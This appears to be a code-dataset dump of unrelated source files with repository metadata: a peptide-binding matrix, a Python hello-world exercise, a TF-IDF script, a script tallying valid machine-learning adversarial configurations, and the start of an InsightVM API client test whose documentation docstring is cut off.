] | permissive | FRED-2/Fred2 | 9845f6678d4011cb746c7a5a6f283eea68077a02 | b3e54c8c4ed12b780b61f74672e9667245a7bb78 | refs/heads/master | 2021-07-12T05:05:54.515427 | 2020-05-25T06:56:25 | 2020-05-25T06:56:25 | 16,275,425 | 42 | 35 | null | 2021-07-07T12:05:11 | 2014-01-27T10:08:11 | Python | UTF-8 | Python | false | false | 2,169 | py | DRB1_0480_9 = {0: {'A': -999.0, 'E': -999.0, 'D': -999.0, 'G': -999.0, 'F': -0.004754, 'I': -0.99525, 'H': -999.0, 'K': -999.0, 'M': -0.99525, 'L': -0.99525, 'N': -999.0, 'Q': -999.0, 'P': -999.0, 'S': -999.0, 'R': -999.0, 'T': -999.0, 'W': -0.004754, 'V': -0.99525, 'Y': -0.004754}, 1: {'A': 0.0, 'E': 0.1, 'D': -1.3, 'G': 0.5, 'F': 0.8, 'I': 1.1, 'H': 0.8, 'K': 1.1, 'M': 1.1, 'L': 1.0, 'N': 0.8, 'Q': 1.2, 'P': -0.5, 'S': -0.3, 'R': 2.2, 'T': 0.0, 'W': -0.1, 'V': 2.1, 'Y': 0.9}, 2: {'A': 0.0, 'E': -1.2, 'D': -1.3, 'G': 0.2, 'F': 0.8, 'I': 1.5, 'H': 0.2, 'K': 0.0, 'M': 1.4, 'L': 1.0, 'N': 0.5, 'Q': 0.0, 'P': 0.3, 'S': 0.2, 'R': 0.7, 'T': 0.0, 'W': 0.0, 'V': 0.5, 'Y': 0.8}, 3: {'A': 0.0, 'E': -0.33143, 'D': -0.36514, 'G': -2.0591, 'F': 0.36585, 'I': 0.95537, 'H': -0.2281, 'K': -1.4856, 'M': 1.4546, 'L': 0.86213, 'N': -0.17568, 'Q': 0.23244, 'P': -1.3948, 'S': -0.23788, 'R': -2.0746, 'T': -0.3733, 'W': -0.34023, 'V': -0.00016686, 'Y': -0.77543}, 4: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 5: {'A': 0.0, 'E': -2.3798, 'D': -1.1245, 'G': -1.483, 'F': -1.1051, 'I': -0.084718, 'H': -1.3744, 'K': -2.3275, 'M': -1.0952, 'L': -1.0742, 'N': 1.263, 'Q': -1.4765, 'P': 0.0093511, 'S': 0.97855, 'R': -2.3322, 'T': 1.8771, 'W': -1.0072, 'V': 0.90462, 'Y': -1.4966}, 6: {'A': 0.0, 'E': -0.70382, 'D': -1.2017, 'G': -1.1093, 'F': -0.366, 'I': 0.042256, 'H': -0.31036, 'K': -0.86425, 'M': 0.6483, 'L': 0.42064, 'N': 0.34102, 'Q': -0.25364, 'P': -0.85722, 'S': -0.020483, 'R': -0.81007, 'T': -0.15788, 'W': -0.83077, 'V': -0.16921, 'Y': -0.51701}, 7: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0}, 8: {'A': 0.0, 'E': -0.29158, 'D': -0.43532, 'G': -0.37531, 'F': -0.55063, 'I': -0.19134, 'H': 0.63181, 'K': -0.62119, 'M': 0.13433, 'L': -0.5213, 'N': -0.46339, 'Q': 0.85581, 'P': -1.0975, 'S': 0.70702, 'R': -0.97291, 'T': -0.77221, 'W': -0.58512, 'V': -0.54344, 'Y': -0.46934}} | [
"schubert@informatik.uni-tuebingen.de"
] | schubert@informatik.uni-tuebingen.de |
c3a8be6b31ad7be0593c0e31bb22f7c2ab3432ad | a9f3b1cbf04b78a79d66a7ab713e497262d4ca11 | /ex1.py | ed18fb454da2b1adf56958f417b944e700a7eb4a | [] | no_license | nehptune/LPTHW | 18aea7c24ee95758286d5eec6c612c194bd00e35 | 0c21992e783b920539f68277da3392de61d949bd | refs/heads/master | 2021-01-22T23:53:47.324593 | 2013-07-04T21:42:57 | 2013-07-04T21:42:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | print "Hello World!"
#print "Hello Again"
#print "I like typing this."
#print "This is fun."
#print "Yay! Printing."
#print "I'd much rather you 'not'."
#print 'I "said" do not touch this.'
#print "here goes another line..."
| [
"sophie.clayton@gmail.com"
] | sophie.clayton@gmail.com |
03141166a5bda5723952bf49f8c51c0d52f15fc7 | 43c24c890221d6c98e4a45cd63dba4f1aa859f55 | /test/tests/assign_empty_list.py | a0b6e7f7ede213462c6b0daa209159a69c6f24cb | [
"Python-2.0",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | jmgc/pyston | c8e4df03c33c6b81d20b7d51a781d9e10148238e | 9f672c1bbb75710ac17dd3d9107da05c8e9e8e8f | refs/heads/master | 2020-12-11T07:51:58.968440 | 2020-09-11T14:38:38 | 2020-09-11T14:38:38 | 39,242,644 | 0 | 0 | NOASSERTION | 2020-09-11T14:38:39 | 2015-07-17T08:09:31 | Python | UTF-8 | Python | false | false | 8 | py | [] = []
| [
"daekharel@gmail.com"
] | daekharel@gmail.com |
0be6318f0912ecd7eb2f410d4e3b25c8748e7aee | 702feb18a94847b2bcb2ee0e145735ac997bcb96 | /scripts/RQ1.4/script_eval_nb_valid_attack_nonacc.py | e8765a061cd9c3b9ea495f3c35dd3a55a95bd763 | [] | no_license | templep/SPLC_2019 | daa7f8c4b1f4bb0a2bb00ee2cfd329cbdbdc45d0 | a74029072f213853f8c866613208e3de8fd94e91 | refs/heads/master | 2020-05-04T07:01:00.040275 | 2019-06-25T08:11:22 | 2019-06-25T08:11:22 | 179,019,331 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,939 | py | import numpy as np
from os import path
import glob
import sys
##adv attack
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*_20_label_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*50_label_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/adv_attack_norm/non_acc/*100_label_nonacc.csv")
##random attack
#filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*20_nonacc.csv")
#filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*50_nonacc.csv")
filenames=glob.glob("../../results/config_pt/random_attack_norm/non_acc/*100_nonacc.csv")
#print (filenames)
for f in filenames:
nb_failed=0
data=np.genfromtxt(f,delimiter=",")
data_attack=data[489:,:]
for l in data_attack:
if (l[0] > 16) or (l[1] > 8) or (l[2] > 16) or (l[3] > 8) or (l[4] > 16) or (l[5] > 8) or (l[6] > 16) or (l[7] > 8) or (l[8] > 16) or (l[9] > 8) or (l[10] < 0) or (l[10] > 1) or (l[11] < 0) or (l[11] > 1) or (l[12] < 0) or (l[12] > 1) or (l[13] < 0) or (l[13] > 1) or (l[14] < 0) or (l[14] > 1) or (l[15] < 0) or (l[15] > 1) or (l[16] < 0) or (l[16] > 1) or (l[17] < 0) or (l[17] > 1) or (l[18] < 0) or (l[18] > 1) or (l[19] < 0) or (l[19] > 1) or (l[20] < 0) or (l[20] > 1) or (l[21] < 0) or (l[21] > 1) or (l[22] < 0) or (l[22] > 1) or (l[29] < 0) or (l[29] > 1) or (l[30] < 0) or (l[30] > 1) or (l[31] < 0) or (l[31] > 1) or (l[32] < 0) or (l[32] > 1) or (l[33] < 0) or (l[33] > 1) or (l[34] < 0) or (l[34] > 1):
nb_failed +=1
output_f=path.basename(f)
output=open("../../results/4000_gen_adv_config/result_valid_attack/adv_attack_norm/"+output_f,"w")
#output=open("../../results/4000_gen_adv_config/result_valid_attack/random_attack_norm/"+output_f,"w")
orig_stdout = sys.stdout
sys.stdout = output
print ("nb invalid attack: "+str(nb_failed))
print ("nb valid attack: "+str(4000-nb_failed))
sys.stdout = orig_stdout
output.close()
| [
"ptemple@pctemple.irisa.fr"
] | ptemple@pctemple.irisa.fr |
3d57065134a29be5a98705c8f7af7bd511c0c906 | 2d2b86d57ed11c375a98754556968571f37342cc | /src/tf_idf/get_tf_idf_doc.py | 9e5799f0f2bd990d4d7227cc17e131d3ad4f08d3 | [] | no_license | FeixLiu/506_2020_midterm | 7341134db3fc563306ce207512623518a7b978ff | d88e98635197ae8f16c6869b80b39c85e546a48b | refs/heads/master | 2022-04-19T07:40:43.086193 | 2020-03-21T17:59:43 | 2020-03-21T19:17:23 | 249,031,414 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,160 | py | import csv
import re
import math
from sklearn.feature_extraction.text import CountVectorizer
path = '../data/train.csv'
stop_words = set({}.fromkeys([line.strip() for line in open('../data/stopword.txt')]))
data = {}
all_file = []
with open(path) as file:
all_data = csv.reader(file)
count = 0
for i in all_data:
if count == 0:
count = 1
continue
if i[5] == '':
continue
tmp = i[7]
tmp = re.sub(r'[^a-zA-Z]', ' ', tmp)
words = tmp.lower().split()
words = [w for w in words if w not in stop_words]
try:
data[int(float(i[5]))].append(' '.join(words))
except KeyError:
data[int(float(i[5]))] = [' '.join(words)]
all_file.append(' '.join(words))
count += 1
vectorizer = CountVectorizer(decode_error='replace', max_features=10000)
vectorizer.fit(all_file)
vocab = {}.fromkeys(vectorizer.get_feature_names())
idf = {}
for line in all_file:
line = line.split(' ')
line = set(line)
for word in line:
try:
a = vocab[word]
try:
idf[word] += 1
except KeyError:
idf[word] = 1
except KeyError:
continue
total_file = len(all_file)
for i in idf.keys():
idf[i] = math.log(total_file / idf[i])
idf = sorted(idf.items(), key=lambda x: x[1], reverse=True)
with open('../tf_idf/idf.txt', 'w') as file:
for i in idf:
file.write(i[0] + "\t" + str(i[1]) + '\n')
for key in data.keys():
count = 0
tf = {}
for line in data[key]:
line = line.split(' ')
count += len(line)
for word in line:
try:
a = vocab[word]
try:
tf[word] += 1
except KeyError:
tf[word] = 1
except KeyError:
continue
for i in tf.keys():
tf[i] = tf[i] / count
tf = sorted(tf.items(), key=lambda x: x[1], reverse=True)
with open('../tf_idf/tf' + str(key) + '.txt', 'w') as file:
for i in tf:
file.write(i[0] + "\t" + str(i[1]) + '\n')
| [
"yuangliu@YuangLiudeMacBook-Pro.local"
] | yuangliu@YuangLiudeMacBook-Pro.local |
b1b5d4c9662f948f6cb0351194e8af4c4eab7524 | acc9d729e0182b17023e9660457eed0e19f4f828 | /test/test_exception_scope.py | 22945ab9e2fae2a05406475b22a8ad88e8dbef90 | [] | no_license | secuwave/nexpose_client | 2f00907ef3ffea33c8e9f5cc2543e708f349de6c | 5ceff219ae03cadb5407dc48d8858ffa56bb3463 | refs/heads/master | 2020-05-22T13:54:22.675479 | 2019-05-13T09:12:09 | 2019-05-13T09:12:09 | 186,369,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,879 | py | # coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representation State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"api.json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using a Base64 encoded hash of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. | `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. | `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. ### Instance Resources Instance resources can support the `GET`, `PUT`, `POST`, `PATCH` and `DELETE` operations. #### GET Retrieves the details of a specific resource by its identifier. The details retrieved can be controlled through property selection and property views. The content of the resource is returned within the body of the response in the acceptable media type. #### PUT Allows for and idempotent \"full update\" (complete replacement) on a specific resource. If the resource does not exist, it will be created; if it does exist, it is completely overwritten. Any omitted properties in the request are assumed to be undefined/null. For \"partial updates\" use `POST` or `PATCH` instead. The content of the `PUT` request is sent in the request body. The identifier of the resource is specified within the URL (not the request body). The response to a successful `PUT` request is a `201 CREATED` to represent the created status, with a valid `Location` header field set to the URI that can be used to access to the newly created (or fully replaced) resource. #### POST Performs a non-idempotent creation of a new resource. The `POST` of an instance resource most commonly occurs with the use of nested resources (e.g. searching on a parent collection resource). The response to a `POST` of an instance resource is typically a `200 OK` if the resource is non-persistent, and a `201 CREATED` if there is a resource created/persisted as a result of the operation. This varies by endpoint. #### PATCH The `PATCH` operation is used to perform a partial update of a resource. `PATCH` is a non-idempotent operation that enforces an atomic mutation of a resource. Only the properties specified in the request are to be overwritten on the resource it is applied to. If a property is missing, it is assumed to not have changed. #### DELETE Permanently removes the individual resource from the system. If the resource is an association between resources, only the association is removed, not the resources themselves. A successful deletion of the resource should return `204 NO CONTENT` with no response body. This operation is not fully idempotent, as follow-up requests to delete a non-existent resource should return a `404 NOT FOUND`. ## Requests Unless otherwise indicated, the default request body media type is `application/json`. ### Headers Commonly used request headers include: | Header | Example | Purpose | | ------------------ | --------------------------------------------- | ---------------------------------------------------------------------------------------------- | | `Accept` | `application/json` | Defines what acceptable content types are allowed by the client. For all types, use `*/*`. | | `Accept-Encoding` | `deflate, gzip` | Allows for the encoding to be specified (such as gzip). | | `Accept-Language` | `en-US` | Indicates to the server the client's locale (defaults `en-US`). | | `Authorization ` | `Basic Base64(\"username:password\")` | Basic authentication | | `Token ` | `123456` | Two-factor authentication token (if enabled) | ### Dates & Times Dates and/or times are specified as strings in the ISO 8601 format(s). The following formats are supported as input: | Value | Format | Notes | | --------------------------- | ------------------------------------------------------ | ----------------------------------------------------- | | Date | YYYY-MM-DD | Defaults to 12 am UTC (if used for a date & time | | Date & time only | YYYY-MM-DD'T'hh:mm:ss[.nnn] | Defaults to UTC | | Date & time in UTC | YYYY-MM-DD'T'hh:mm:ss[.nnn]Z | | | Date & time w/ offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm | | | Date & time w/ zone-offset | YYYY-MM-DD'T'hh:mm:ss[.nnn][+|-]hh:mm[<zone-id>] | | ### Timezones Timezones are specified in the regional zone format, such as `\"America/Los_Angeles\"`, `\"Asia/Tokyo\"`, or `\"GMT\"`. ### Paging Pagination is supported on certain collection resources using a combination of two query parameters, `page` and `size`. As these are control parameters, they are prefixed with the underscore character. The page parameter dictates the zero-based index of the page to retrieve, and the `size` indicates the size of the page. For example, `/resources?page=2&size=10` will return page 3, with 10 records per page, giving results 21-30. The maximum page size for a request is 500. ### Sorting Sorting is supported on paginated resources with the `sort` query parameter(s). The sort query parameter(s) supports identifying a single or multi-property sort with a single or multi-direction output. The format of the parameter is: ``` sort=property[,ASC|DESC]... ``` Therefore, the request `/resources?sort=name,title,DESC` would return the results sorted by the name and title descending, in that order. The sort directions are either ascending `ASC` or descending `DESC`. With single-order sorting, all properties are sorted in the same direction. To sort the results with varying orders by property, multiple sort parameters are passed. For example, the request `/resources?sort=name,ASC&sort=title,DESC` would sort by name ascending and title descending, in that order. ## Responses The following response statuses may be returned by this API. | Status | Meaning | Usage | | ------ | ------------------------ |------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | `200` | OK | The operation performed without error according to the specification of the request, and no more specific 2xx code is suitable. | | `201` | Created | A create request has been fulfilled and a resource has been created. The resource is available as the URI specified in the response, including the `Location` header. | | `202` | Accepted | An asynchronous task has been accepted, but not guaranteed, to be processed in the future. | | `400` | Bad Request | The request was invalid or cannot be otherwise served. The request is not likely to succeed in the future without modifications. | | `401` | Unauthorized | The user is unauthorized to perform the operation requested, or does not maintain permissions to perform the operation on the resource specified. | | `403` | Forbidden | The resource exists to which the user has access, but the operating requested is not permitted. | | `404` | Not Found | The resource specified could not be located, does not exist, or an unauthenticated client does not have permissions to a resource. | | `405` | Method Not Allowed | The operations may not be performed on the specific resource. Allowed operations are returned and may be performed on the resource. | | `408` | Request Timeout | The client has failed to complete a request in a timely manner and the request has been discarded. | | `413` | Request Entity Too Large | The request being provided is too large for the server to accept processing. | | `415` | Unsupported Media Type | The media type is not supported for the requested resource. | | `500` | Internal Server Error | An internal and unexpected error has occurred on the server at no fault of the client. | ### Security The response statuses 401, 403 and 404 need special consideration for security purposes. As necessary, error statuses and messages may be obscured to strengthen security and prevent information exposure. The following is a guideline for privileged resource response statuses: | Use Case | Access | Resource | Permission | Status | | ------------------------------------------------------------------ | ------------------ |------------------- | ------------ | ------------ | | Unauthenticated access to an unauthenticated resource. | Unauthenticated | Unauthenticated | Yes | `20x` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Authenticated | No | `401` | | Unauthenticated access to an authenticated resource. | Unauthenticated | Non-existent | No | `401` | | Authenticated access to a unauthenticated resource. | Authenticated | Unauthenticated | Yes | `20x` | | Authenticated access to an authenticated, unprivileged resource. | Authenticated | Authenticated | No | `404` | | Authenticated access to an authenticated, privileged resource. | Authenticated | Authenticated | Yes | `20x` | | Authenticated access to an authenticated, non-existent resource | Authenticated | Non-existent | Yes | `404` | ### Headers Commonly used response headers include: | Header | Example | Purpose | | -------------------------- | --------------------------------- | --------------------------------------------------------------- | | `Allow` | `OPTIONS, GET` | Defines the allowable HTTP operations on a resource. | | `Cache-Control` | `no-store, must-revalidate` | Disables caching of resources (as they are all dynamic). | | `Content-Encoding` | `gzip` | The encoding of the response body (if any). | | `Location` | | Refers to the URI of the resource created by a request. | | `Transfer-Encoding` | `chunked` | Specified the encoding used to transform response. | | `Retry-After` | 5000 | Indicates the time to wait before retrying a request. | | `X-Content-Type-Options` | `nosniff` | Disables MIME type sniffing. | | `X-XSS-Protection` | `1; mode=block` | Enables XSS filter protection. | | `X-Frame-Options` | `SAMEORIGIN` | Prevents rendering in a frame from a different origin. | | `X-UA-Compatible` | `IE=edge,chrome=1` | Specifies the browser mode to render in. | ### Format When `application/json` is returned in the response body it is always pretty-printed (indented, human readable output). Additionally, gzip compression/encoding is supported on all responses. #### Dates & Times Dates or times are returned as strings in the ISO 8601 'extended' format. When a date and time is returned (instant) the value is converted to UTC. For example: | Value | Format | Example | | --------------- | ------------------------------ | --------------------- | | Date | `YYYY-MM-DD` | 2017-12-03 | | Date & Time | `YYYY-MM-DD'T'hh:mm:ss[.nnn]Z` | 2017-12-03T10:15:30Z | #### Content In some resources a Content data type is used. This allows for multiple formats of representation to be returned within resource, specifically `\"html\"` and `\"text\"`. The `\"text\"` property returns a flattened representation suitable for output in textual displays. The `\"html\"` property returns an HTML fragment suitable for display within an HTML element. Note, the HTML returned is not a valid stand-alone HTML document. #### Paging The response to a paginated request follows the format: ```json { resources\": [ ... ], \"page\": { \"number\" : ..., \"size\" : ..., \"totalResources\" : ..., \"totalPages\" : ... }, \"links\": [ \"first\" : { \"href\" : \"...\" }, \"prev\" : { \"href\" : \"...\" }, \"self\" : { \"href\" : \"...\" }, \"next\" : { \"href\" : \"...\" }, \"last\" : { \"href\" : \"...\" } ] } ``` The `resources` property is an array of the resources being retrieved from the endpoint, each which should contain at minimum a \"self\" relation hypermedia link. The `page` property outlines the details of the current page and total possible pages. The object for the page includes the following properties: - number - The page number (zero-based) of the page returned. - size - The size of the pages, which is less than or equal to the maximum page size. - totalResources - The total amount of resources available across all pages. - totalPages - The total amount of pages. The last property of the paged response is the `links` array, which contains all available hypermedia links. For paginated responses, the \"self\", \"next\", \"previous\", \"first\", and \"last\" links are returned. The \"self\" link must always be returned and should contain a link to allow the client to replicate the original request against the collection resource in an identical manner to that in which it was invoked. The \"next\" and \"previous\" links are present if either or both there exists a previous or next page, respectively. The \"next\" and \"previous\" links have hrefs that allow \"natural movement\" to the next page, that is all parameters required to move the next page are provided in the link. The \"first\" and \"last\" links provide references to the first and last pages respectively. Requests outside the boundaries of the pageable will result in a `404 NOT FOUND`. Paginated requests do not provide a \"stateful cursor\" to the client, nor does it need to provide a read consistent view. Records in adjacent pages may change while pagination is being traversed, and the total number of pages and resources may change between requests within the same filtered/queries resource collection. #### Property Views The \"depth\" of the response of a resource can be configured using a \"view\". All endpoints supports two views that can tune the extent of the information returned in the resource. The supported views are `summary` and `details` (the default). View are specified using a query parameter, in this format: ```bash /<resource>?view={viewName} ``` #### Error Any error responses can provide a response body with a message to the client indicating more information (if applicable) to aid debugging of the error. All 40x and 50x responses will return an error response in the body. The format of the response is as follows: ```json { \"status\": <statusCode>, \"message\": <message>, \"links\" : [ { \"rel\" : \"...\", \"href\" : \"...\" } ] } ``` The `status` property is the same as the HTTP status returned in the response, to ease client parsing. The message property is a localized message in the request client's locale (if applicable) that articulates the nature of the error. The last property is the `links` property. This may contain additional [hypermedia links](#section/Overview/Authentication) to troubleshoot. #### Search Criteria <a section=\"section/Responses/SearchCriteria\"></a> Multiple resources make use of search criteria to match assets. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The operator is a type and property-specific operating performed on the filtered property. The valid values for fields and operators are outlined in the table below. Every filter also defines one or more values that are supplied to the operator. The valid values vary by operator and are outlined below. ##### Fields The following table outlines the search criteria fields and the available operators: | Field | Operators | | --------------------------------- | ------------------------------------------------------------------------------------------------------------------------------ | | `alternate-address-type` | `in` | | `container-image` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is like` ` not like` | | `container-status` | `is` ` is not` | | `containers` | `are` | | `criticality-tag` | `is` ` is not` ` is greater than` ` is less than` ` is applied` ` is not applied` | | `custom-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `cve` | `is` ` is not` ` contains` ` does not contain` | | `cvss-access-complexity` | `is` ` is not` | | `cvss-authentication-required` | `is` ` is not` | | `cvss-access-vector` | `is` ` is not` | | `cvss-availability-impact` | `is` ` is not` | | `cvss-confidentiality-impact` | `is` ` is not` | | `cvss-integrity-impact` | `is` ` is not` | | `cvss-v3-confidentiality-impact` | `is` ` is not` | | `cvss-v3-integrity-impact` | `is` ` is not` | | `cvss-v3-availability-impact` | `is` ` is not` | | `cvss-v3-attack-vector` | `is` ` is not` | | `cvss-v3-attack-complexity` | `is` ` is not` | | `cvss-v3-user-interaction` | `is` ` is not` | | `cvss-v3-privileges-required` | `is` ` is not` | | `host-name` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is empty` ` is not empty` ` is like` ` not like` | | `host-type` | `in` ` not in` | | `ip-address` | `is` ` is not` ` in range` ` not in range` ` is like` ` not like` | | `ip-address-type` | `in` ` not in` | | `last-scan-date` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `location-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `mobile-device-last-sync-time` | `is-within-the-last` ` is earlier than` | | `open-ports` | `is` ` is not` ` in range` | | `operating-system` | `contains` ` does not contain` ` is empty` ` is not empty` | | `owner-tag` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` ` is applied` ` is not applied` | | `pci-compliance` | `is` | | `risk-score` | `is` ` is not` ` in range` ` greater than` ` less than` | | `service-name` | `contains` ` does not contain` | | `site-id` | `in` ` not in` | | `software` | `contains` ` does not contain` | | `vAsset-cluster` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-datacenter` | `is` ` is not` | | `vAsset-host-name` | `is` ` is not` ` contains` ` does not contain` ` starts with` | | `vAsset-power-state` | `in` ` not in` | | `vAsset-resource-pool-path` | `contains` ` does not contain` | | `vulnerability-assessed` | `is-on-or-before` ` is on or after` ` is between` ` is earlier than` ` is within the last` | | `vulnerability-category` | `is` ` is not` ` starts with` ` ends with` ` contains` ` does not contain` | | `vulnerability-cvss-v3-score` | `is` ` is not` | | `vulnerability-cvss-score` | `is` ` is not` ` in range` ` is greater than` ` is less than` | | `vulnerability-exposures` | `includes` ` does not include` | | `vulnerability-title` | `contains` ` does not contain` ` is` ` is not` ` starts with` ` ends with` | | `vulnerability-validated-status` | `are` | ##### Enumerated Properties The following fields have enumerated values: | Field | Acceptable Values | | ----------------------------------------- | ------------------------------------------------------------------------------------------------------------- | | `alternate-address-type` | 0=IPv4, 1=IPv6 | | `containers` | 0=present, 1=not present | | `container-status` | `created` `running` `paused` `restarting` `exited` `dead` `unknown` | | `cvss-access-complexity` | <ul><li><code>L</code> = Low</li><li><code>M</code> = Medium</li><li><code>H</code> = High</li></ul> | | `cvss-integrity-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-confidentiality-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-availability-impact` | <ul><li><code>N</code> = None</li><li><code>P</code> = Partial</li><li><code>C</code> = Complete</li></ul> | | `cvss-access-vector` | <ul><li><code>L</code> = Local</li><li><code>A</code> = Adjacent</li><li><code>N</code> = Network</li></ul> | | `cvss-authentication-required` | <ul><li><code>N</code> = None</li><li><code>S</code> = Single</li><li><code>M</code> = Multiple</li></ul> | | `cvss-v3-confidentiality-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-integrity-impact` | <ul><li><code>L</code> = Local</li><li><code>L</code> = Low</li><li><code>N</code> = None</li><li><code>H</code> = High</li></ul> | | `cvss-v3-availability-impact` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-attack-vector` | <ul><li><code>N</code> = Network</li><li><code>A</code> = 